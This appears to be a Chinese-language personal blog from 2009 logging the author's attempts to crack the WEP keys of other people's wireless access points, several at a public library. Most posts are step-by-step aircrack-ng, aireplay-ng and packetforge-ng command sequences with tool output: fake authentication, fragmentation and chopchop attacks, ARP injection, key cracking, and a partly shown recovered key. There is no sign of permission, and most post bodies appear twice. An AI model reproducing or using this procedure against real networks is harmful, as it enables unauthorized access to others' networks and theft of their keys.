平時在執行完第一號攻擊後,就不太管它了。祗要專注在接下的情況,該採第二、三、四、還是五號攻擊模式。但這一次實驗中,在進行 (1-5-2)模式時,第二號攻不下,即data沒動。改 (1-4-2) 模式,竟然也攻不下。兩次的xor檔都拿到了,也都轉成arp了,竟inject不成。補上第九號測試攻擊也不克。
改變戰術,重新再虛假認證一次,直接以 (1-4-2)的arp檔進行二號攻擊,成了。改以 (1-5-2)的arp檔攻擊,也成了。
故不是五號或四號的xor沒用,而是在進行中,第一次的虛假認證消失了,得再補上一劑,就ok。
2009年11月6日 星期五
4與5號的xor也有不同
這回在查看有data,無client之情況下,先用 (1-5-2)模式攻擊,順利取得xor並轉成arp檔進行資料灌注。但data並無明顯增長。
別開一console,以第九號攻擊,情況並未改善。
停止第二號資料灌注,改以 (1-4-2)模式,順利取得xor,也轉成另一個arp檔,這回以第二號資料灌注,即成功地使data增大了。順利取得金鑰。
別開一console,以第九號攻擊,情況並未改善。
停止第二號資料灌注,改以 (1-4-2)模式,順利取得xor,也轉成另一個arp檔,這回以第二號資料灌注,即成功地使data增大了。順利取得金鑰。
2009年11月5日 星期四
(1-4-2) 攻擊模式
一直沒機會用到第四號攻擊,沒想到,這一次實現了。
一個帶有client的ap,用(1-5-2)採不到xor,用(1-3)得不到cap檔,用(1-2)祗讀取而不發送;最後祗了以第四號攻擊一試。竟一試達陣。
一,
1.airodump-ng --bssid [ap' mac] -c 1 --ivs -w home mon0
a.以存取ivs模式進入頻道一之監控。
二,
1.aireplay-ng -1 0 -a $AP -h $MAC mon0
a.一號攻擊,以自己mac取得ap聯繫。結果:Association successful :-) (AID: 1)
2.aireplay-ng -5 -b $AP -h $MAC mon0
a.以第五號模式攻擊。結果:Still nothing, trying another packet...
3.aireplay-ng -3 -b $AP -h $MAC -x 1024 mon0
a.改以第三號模式攻擊。結果:(got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
4.aireplay-ng -4 -b $AP -h $MAC mon0
a.以第四號模式攻擊。
b.Use this packet ? y
c.Saving chosen packet in replay_src-1106-140117.cap
Offset 87 ( 3% done) | xor = EA | pt = BD | 582 frames written in 9908ms
Offset 86 ( 5% done) | xor = A6 | pt = EF | 256 frames written in 4341ms
Offset 85 ( 7% done) | xor = 5C | pt = B4 | 275 frames written in 4677ms
...
Saving plaintext in replay_dec-1106-140237.cap
Saving keystream in replay_dec-1106-140237.xor
Completed in 76s (0.68 bytes/s)
5.packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1106-140237.xor -w home-arp
a.把從第四號攻擊得到的xor檔,轉成arp檔。
6.aireplay-ng -2 -r home-arp -x 1024 mon0
a.以arp檔進行第二號攻擊。
b.Use this packet ? y
data終於開始增加了。 good!
三,
1.aircrack-ng -x -f 2 -s home-02.ivs
a.解由airodump所存取的ivs檔。
Starting PTW attack with 43436 ivs.
KEY FOUND! [ xx:xx:xx:xx:xx ]
Decrypted correctly: 100%
一個帶有client的ap,用(1-5-2)採不到xor,用(1-3)得不到cap檔,用(1-2)祗讀取而不發送;最後祗了以第四號攻擊一試。竟一試達陣。
一,
1.airodump-ng --bssid [ap' mac] -c 1 --ivs -w home mon0
a.以存取ivs模式進入頻道一之監控。
二,
1.aireplay-ng -1 0 -a $AP -h $MAC mon0
a.一號攻擊,以自己mac取得ap聯繫。結果:Association successful :-) (AID: 1)
2.aireplay-ng -5 -b $AP -h $MAC mon0
a.以第五號模式攻擊。結果:Still nothing, trying another packet...
3.aireplay-ng -3 -b $AP -h $MAC -x 1024 mon0
a.改以第三號模式攻擊。結果:(got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
4.aireplay-ng -4 -b $AP -h $MAC mon0
a.以第四號模式攻擊。
b.Use this packet ? y
c.Saving chosen packet in replay_src-1106-140117.cap
Offset 87 ( 3% done) | xor = EA | pt = BD | 582 frames written in 9908ms
Offset 86 ( 5% done) | xor = A6 | pt = EF | 256 frames written in 4341ms
Offset 85 ( 7% done) | xor = 5C | pt = B4 | 275 frames written in 4677ms
...
Saving plaintext in replay_dec-1106-140237.cap
Saving keystream in replay_dec-1106-140237.xor
Completed in 76s (0.68 bytes/s)
5.packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1106-140237.xor -w home-arp
a.把從第四號攻擊得到的xor檔,轉成arp檔。
6.aireplay-ng -2 -r home-arp -x 1024 mon0
a.以arp檔進行第二號攻擊。
b.Use this packet ? y
data終於開始增加了。 good!
三,
1.aircrack-ng -x -f 2 -s home-02.ivs
a.解由airodump所存取的ivs檔。
Starting PTW attack with 43436 ivs.
KEY FOUND! [ xx:xx:xx:xx:xx ]
Decrypted correctly: 100%
第九號攻擊
完成了這個一實驗,wep破解就快修成正果了。來到圖書館,有一堆無線網給你測試,並非每個情況都一樣,蠻好玩的。
這回是碰到了:以(1-5-2)模式攻擊,
一號攻擊,順利取得認證聯繫;
五號攻擊,順利得到xor檔;再以packetforge轉成arp檔;
二號攻擊,data一種是毫無所動,一種是增在一千多就自動停止。
原本以為在能取得xor檔之後,幾乎就等於一定拿得到金鑰。誰知竟然會敗在第二號的交互攻擊。(interactive frame selection)
改以字典破解法攻擊無效,顯然此金鑰設得並不簡單。
突然腦中有一個想法,data不漲是因為所發去的資料沒能注入(inject) ap端,故測測看情況如何。
另開一terminal,執行
aireplay-ng -9 -a [ap's mac] -h [own mac] mon0
結果,...奇蹟出現了。在測試的同時,data開始向上漲了。但測試跑完後,data也停了。漲一次約多進帳了近2000個ivs。接著就不斷以此法去執行「第九號攻擊」。
嚴格來說,-9的用途祗是測試是否能注入資料到ap用,不算是一種攻擊模式;但現在配上第二號攻擊,卻有如此神效,實出乎意料之外。注意:僅第九號測試,data是不會漲的,須配合第二號,兩個terminal同時執行才可。
最後得出的金鑰,果然很長:是六個英文小寫字母加上七個數字,共十三碼,難怪字典破不了。
這回是碰到了:以(1-5-2)模式攻擊,
一號攻擊,順利取得認證聯繫;
五號攻擊,順利得到xor檔;再以packetforge轉成arp檔;
二號攻擊,data一種是毫無所動,一種是增在一千多就自動停止。
原本以為在能取得xor檔之後,幾乎就等於一定拿得到金鑰。誰知竟然會敗在第二號的交互攻擊。(interactive frame selection)
改以字典破解法攻擊無效,顯然此金鑰設得並不簡單。
突然腦中有一個想法,data不漲是因為所發去的資料沒能注入(inject) ap端,故測測看情況如何。
另開一terminal,執行
aireplay-ng -9 -a [ap's mac] -h [own mac] mon0
結果,...奇蹟出現了。在測試的同時,data開始向上漲了。但測試跑完後,data也停了。漲一次約多進帳了近2000個ivs。接著就不斷以此法去執行「第九號攻擊」。
嚴格來說,-9的用途祗是測試是否能注入資料到ap用,不算是一種攻擊模式;但現在配上第二號攻擊,卻有如此神效,實出乎意料之外。注意:僅第九號測試,data是不會漲的,須配合第二號,兩個terminal同時執行才可。
最後得出的金鑰,果然很長:是六個英文小寫字母加上七個數字,共十三碼,難怪字典破不了。
字典破解
最近破了一個ap,但是是用了一個很取巧的方法。即字典破法,又稱暴力破解。根本不管它的編碼機制,而直接一個一個地去猜,就像在破wpa之樣。
這個情形是這樣的,先以(1-3)(1-2)模式獲取約上千個ivs,將ivs以windows下的aircrack-ng gui版去以字典破解,還好,這個密碼是五個d,字母全一樣,字串又很短,字典裡剛好有,結果一下就找到了。
依此法設法去破其它ap,又重編更大的字典,卻無功而返。編字典的關鍵在於它將字元分四大塊:
1.數字。0..9
2.大寫字母。A-Z
3.小寫字母。a-z
4.其它符號。!@#$
其次是看你要編碼的長度,1-8不等。
若祗要編數字,8碼,則佔 1G
若要數字加大寫字母,8碼,則佔 26,947G
若要數字加大字母加小字母,8碼,則佔 2,063,397G
哪來這麼大硬碟呀
若數字加大小寫字母,5碼,將會佔用 6G
但若增加一碼為6碼,則飊昇到 430G
這也就是為什麼一般密碼設定之建議最少要6碼
做為一個安全門檻
所以在設密碼時,最好是有數字,大字,小字,加符號,長一點,如此最保險。
而字母或數字以愈後面愈難猜中.如不採aA0,而用zZ9
這個情形是這樣的,先以(1-3)(1-2)模式獲取約上千個ivs,將ivs以windows下的aircrack-ng gui版去以字典破解,還好,這個密碼是五個d,字母全一樣,字串又很短,字典裡剛好有,結果一下就找到了。
依此法設法去破其它ap,又重編更大的字典,卻無功而返。編字典的關鍵在於它將字元分四大塊:
1.數字。0..9
2.大寫字母。A-Z
3.小寫字母。a-z
4.其它符號。!@#$
其次是看你要編碼的長度,1-8不等。
若祗要編數字,8碼,則佔 1G
若要數字加大寫字母,8碼,則佔 26,947G
若要數字加大字母加小字母,8碼,則佔 2,063,397G
哪來這麼大硬碟呀
若數字加大小寫字母,5碼,將會佔用 6G
但若增加一碼為6碼,則飊昇到 430G
這也就是為什麼一般密碼設定之建議最少要6碼
做為一個安全門檻
所以在設密碼時,最好是有數字,大字,小字,加符號,長一點,如此最保險。
而字母或數字以愈後面愈難猜中.如不採aA0,而用zZ9
2009年11月3日 星期二
第二號攻擊之時機
昨天發現了有一個帶有client的ap。見獵心喜,就立即把握時機,展開(1-5-2)模式攻擊,但竟卡在第五號攻擊:
Sending fragmented packet
No answer, repeating...
Still nothing, trying another packet...
得不到RELAYED packet!! 重覆好幾次都無效,查看ap's client也還在線,就不知為何???
決然改採第三號攻擊,卻一直讀取而不沒發送....data漲也不漲。
最後祗好換第二號攻擊,不像第五號去分析packet,也不像第三號去讀取data,而是直接注入大量資料給ap,結果,data終於動了,但很緩慢。約等了二個小時,data值已上二萬有餘,再以aircrack-ng破解由airodump所蒐集到的ivs檔,一舉成功。
Sending fragmented packet
No answer, repeating...
Still nothing, trying another packet...
得不到RELAYED packet!! 重覆好幾次都無效,查看ap's client也還在線,就不知為何???
決然改採第三號攻擊,卻一直讀取而不沒發送....data漲也不漲。
最後祗好換第二號攻擊,不像第五號去分析packet,也不像第三號去讀取data,而是直接注入大量資料給ap,結果,data終於動了,但很緩慢。約等了二個小時,data值已上二萬有餘,再以aircrack-ng破解由airodump所蒐集到的ivs檔,一舉成功。
解碼時的問題
這次實驗有一點奇怪,一早到了圖書館,就先進行查看周遭網路情況。
一,開始在第一個terminal
1.airmon-ng start waln0
a.開啟監控界面。
2.airodump-ng --encry wep mon0
a.查看各頻道以wep編碼的ap
b.發現有一個ap的data值有在緩慢地增加到4,表示有連網行為。
c.決定鎖定該ap。
3.airodump-ng --bssid [ap's mac] -c 3 --ivs -w cas mon0
a.以mon0監控界面在第三頻道蒐集該ap的ivs包,寫入cas-01.ivs中。
二,開啟第二terminal
1.export AP=[ap's mac]
2.ifconfig -a
a.查看自己的mac
3.export MAC=[own mac]
4.aireplay-ng -1 0 -a $AP -h $MAC mon0
a.進行第一號攻擊,試圖與ap交手。(association)
b.若成功,顯示:Association successful :-) (AID: 1)
c.這時查看terminal 1,會發現自己已成為ap's client。
5.iwconfig mon0 channel 3
a.確保mon0是在第三頻道。
6.aireplay-ng -5 -b $AP -h $MAC mon0
a.採第五號攻擊。
b.原本在airodump時,並沒有看到有ap's client在線,所以在此進行第五號攻擊時,並不抱持太大希望;沒想到,僅用了三次packet,就Got RELAYED packet!!
c.再轉回terminal 1看,竟然出現了一個client。本尊現身了!
7.packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-1104-085701.xor -w myarp
a.將所得的xor檔轉成arp檔。
8.aireplay-ng -2 -r myarp -x 1024 mon0
a.進行第二號攻擊。
b.讀取arp的資料,以每秒1024bit的速度從監控界面mon0送出。
9.Use this packet ? y
Saving chosen packet in replay_src-1104-085916.cap
a.這時,terminal 1中的data開始穩定地向上增長。
三,開啟第三個terminal
1.aircrack-ng -n 64 -b [ap's mac] cas-01.ivs
a.開始對所蒐集到的ivs以密碼長度64 bits格式進行破解。
b.這時已抓了Starting PTW attack with 44256 ivs,想說馬上就可輕鬆破解。誰知道...
c.Tested 422829 keys (got 237482 IVs)到了23萬多個ivs都還破不了。這可奇了!
2.aircrack-ng -s -b [ap's mac] cas-01.ivs
a.決定停掉,重新再破解一次。這次不限定在64 bits長度的格式了,並加上-s參數,當得出金鑰時,可顯示ascii code。
b.結果,一試就成。
3.airmon-ng stop mon0
a.最後,得到金鑰後別太高興,記得再把監控界面停掉。
一,開始在第一個terminal
1.airmon-ng start waln0
a.開啟監控界面。
2.airodump-ng --encry wep mon0
a.查看各頻道以wep編碼的ap
b.發現有一個ap的data值有在緩慢地增加到4,表示有連網行為。
c.決定鎖定該ap。
3.airodump-ng --bssid [ap's mac] -c 3 --ivs -w cas mon0
a.以mon0監控界面在第三頻道蒐集該ap的ivs包,寫入cas-01.ivs中。
二,開啟第二terminal
1.export AP=[ap's mac]
2.ifconfig -a
a.查看自己的mac
3.export MAC=[own mac]
4.aireplay-ng -1 0 -a $AP -h $MAC mon0
a.進行第一號攻擊,試圖與ap交手。(association)
b.若成功,顯示:Association successful :-) (AID: 1)
c.這時查看terminal 1,會發現自己已成為ap's client。
5.iwconfig mon0 channel 3
a.確保mon0是在第三頻道。
6.aireplay-ng -5 -b $AP -h $MAC mon0
a.採第五號攻擊。
b.原本在airodump時,並沒有看到有ap's client在線,所以在此進行第五號攻擊時,並不抱持太大希望;沒想到,僅用了三次packet,就Got RELAYED packet!!
c.再轉回terminal 1看,竟然出現了一個client。本尊現身了!
7.packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-1104-085701.xor -w myarp
a.將所得的xor檔轉成arp檔。
8.aireplay-ng -2 -r myarp -x 1024 mon0
a.進行第二號攻擊。
b.讀取arp的資料,以每秒1024bit的速度從監控界面mon0送出。
9.Use this packet ? y
Saving chosen packet in replay_src-1104-085916.cap
a.這時,terminal 1中的data開始穩定地向上增長。
三,開啟第三個terminal
1.aircrack-ng -n 64 -b [ap's mac] cas-01.ivs
a.開始對所蒐集到的ivs以密碼長度64 bits格式進行破解。
b.這時已抓了Starting PTW attack with 44256 ivs,想說馬上就可輕鬆破解。誰知道...
c.Tested 422829 keys (got 237482 IVs)到了23萬多個ivs都還破不了。這可奇了!
2.aircrack-ng -s -b [ap's mac] cas-01.ivs
a.決定停掉,重新再破解一次。這次不限定在64 bits長度的格式了,並加上-s參數,當得出金鑰時,可顯示ascii code。
b.結果,一試就成。
3.airmon-ng stop mon0
a.最後,得到金鑰後別太高興,記得再把監控界面停掉。
2009年11月1日 星期日
wep無客戶端(1-3號攻擊模式)破解
在沒有client的情況,wep竟也宣告束手就擒。
一,開第一個terminal
1.minidwep
a.找一個想破的wep,查看頻道號,mac
2.iwconfig mon0 channel [CHno]
a.將監控界面mon0設為該AP的頻道
3.airodump-ng -w [filename] -c [CHno] --bssid [AP's mac] mon0
a.傾倒監控界面mon0在頻道CHno上某一AP的資料寫入[filename]-01.cap中
二,開第二個terminal
1.export MAC=[自己網卡的mac]
2.export AP=[AP's mac]
3.aireplay-ng -1 0 -e [essid] -a $AP -h $MAC mon0
a.進行第一號攻擊,0延遲,[essid]為AP名號
b.若成,則顯示:Association successful :-) (AID: 1)
4.aireplay-ng -3 -b $AP -h $MAC -x 1024 mon0
a.採取第三號攻擊。限制為傳送資料每回為1024。
b.這時會將所得資料寫入replay_arp-1102-094924.cap檔。1102表示11月2日,094924則為9點49分24秒。
c.開始不斷地注入資料。
三,開第三個terminal
1.這時觀看第一個terminal,data值會快速遞增,當達約三萬時,可嘗試進行破解。
2.aircrack-ng -x -f 2 [filename]-01.cap
a.[filename]-01是在第一個terminal中,下airodump-ng指令時所指定的檔名。
b.對[filename]-01.cap進行破解。
四,等待
1.此時三個terminal同時在跑,第一個寫資料到[filename]-01.cap中;第二個進行第三號攻擊;第三個則對不斷增長的[filename]-01.cap進行解碼。
2.這次實驗,是到了資料值為五萬時得到了金鑰。顯示如下:
Tested 943472 keys (got 51579 IVs)
KEY FOUND! [ 6D:61:72:67:61:72:65:74:63:68:65..... ]
3.AP使用了十三個英文字 (可能是他的英文名字吧),才會破得這麼快。若串接數字 (如加上生日),可就等久了。所以自己設密碼得小心些才是。
一,開第一個terminal
1.minidwep
a.找一個想破的wep,查看頻道號,mac
2.iwconfig mon0 channel [CHno]
a.將監控界面mon0設為該AP的頻道
3.airodump-ng -w [filename] -c [CHno] --bssid [AP's mac] mon0
a.傾倒監控界面mon0在頻道CHno上某一AP的資料寫入[filename]-01.cap中
二,開第二個terminal
1.export MAC=[自己網卡的mac]
2.export AP=[AP's mac]
3.aireplay-ng -1 0 -e [essid] -a $AP -h $MAC mon0
a.進行第一號攻擊,0延遲,[essid]為AP名號
b.若成,則顯示:Association successful :-) (AID: 1)
4.aireplay-ng -3 -b $AP -h $MAC -x 1024 mon0
a.採取第三號攻擊。限制為傳送資料每回為1024。
b.這時會將所得資料寫入replay_arp-1102-094924.cap檔。1102表示11月2日,094924則為9點49分24秒。
c.開始不斷地注入資料。
三,開第三個terminal
1.這時觀看第一個terminal,data值會快速遞增,當達約三萬時,可嘗試進行破解。
2.aircrack-ng -x -f 2 [filename]-01.cap
a.[filename]-01是在第一個terminal中,下airodump-ng指令時所指定的檔名。
b.對[filename]-01.cap進行破解。
四,等待
1.此時三個terminal同時在跑,第一個寫資料到[filename]-01.cap中;第二個進行第三號攻擊;第三個則對不斷增長的[filename]-01.cap進行解碼。
2.這次實驗,是到了資料值為五萬時得到了金鑰。顯示如下:
Tested 943472 keys (got 51579 IVs)
KEY FOUND! [ 6D:61:72:67:61:72:65:74:63:68:65..... ]
3.AP使用了十三個英文字 (可能是他的英文名字吧),才會破得這麼快。若串接數字 (如加上生日),可就等久了。所以自己設密碼得小心些才是。
訂閱:
文章 (Atom)
